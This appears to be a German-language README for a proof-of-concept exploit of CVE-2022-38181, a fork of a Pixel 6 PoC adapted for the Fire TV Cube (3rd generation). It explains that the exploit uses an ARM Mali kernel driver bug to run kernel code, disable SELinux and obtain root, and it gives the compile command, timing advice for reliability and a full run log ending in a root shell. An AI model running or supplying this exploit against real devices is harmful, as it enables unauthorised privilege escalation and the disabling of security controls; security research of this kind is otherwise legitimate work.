
CVE-2022-38181 PoC für FireTV 3. Generation Cube (gazelle)
Dies ist ein Fork des Pixel 6 POC des Sicherheitsforschers Man Yue Mo für CVE-2022-38181. Lies seinen detaillierten Bericht über die Sicherheitslücke hier. Es wurden Änderungen vorgenommen, um FireOS' 32-Bit-Benutzerbereich zu berücksichtigen. Der POC nutzt einen Fehler im ARM Mali Kernel-Treiber aus, um beliebigen Kernel-Code auszuführen, der dann verwendet wird, um SELinux zu deaktivieren und Root-Rechte zu erlangen.
Ich habe den folgenden Befehl verwendet, um mit clang in ndk-21 zu kompilieren:
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o gazelle_shrinker
Der Exploit sollte 30-90 Sekunden nach dem Booten des Cubes ausgeführt werden, um die größte Zuverlässigkeit zu erreichen.
gazelle:/ $ /data/local/tmp/gazelle_shrinker
fingerprint: Amazon/gazelle/gazelle:9/PS7613.3701N/0025401652480:user/amz-p,release-keys
failed, retry.
failed, retry.
region freed 47
alias gpu va 100c83000
read 0
cleanup flush region
release_mem_pool
jit_freed
jit_free commit: 6 0
Found freed_idx 6
Found pgd 23, 100d30000
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
gazelle:/ #